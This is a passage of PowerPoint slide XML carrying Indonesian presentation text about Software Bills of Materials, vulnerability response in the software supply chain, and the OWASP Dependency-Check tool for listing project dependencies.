            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komponen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pihak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketiga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditambal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diganti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebelum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>muncul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ini juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melacak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>asal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komponen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komponen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berasal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tepercaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Setelah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengungkapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>insiden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, SBOM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>respons</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perbaikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Tim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menentukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apakah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terpengaruh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diungkapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komponen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengambil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tindakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. SBOM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengamankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rantai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pasokan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berkontribusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pendekatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>proaktif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terinformasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rantai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pasokan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Analisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Ketergantungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> dan Alat SBOM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pemeriksaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Ketergantungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Analisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Komposisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Lunak (SCA) yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketergantungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>proyek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memeriksa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apakah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diketahui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diungkapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkait</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Alat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> daftar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebutuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (SBOM), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meskipun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>utamanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Dependency-Check </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghasilkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>laporan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merinci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pustaka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komponen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>proyek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>versinya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> masing-masing. Jenis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>laporan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berfungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> garis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dasar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> SBOM, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>laporan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencantumkan</a:t>
            </a:r>
            <a:r>
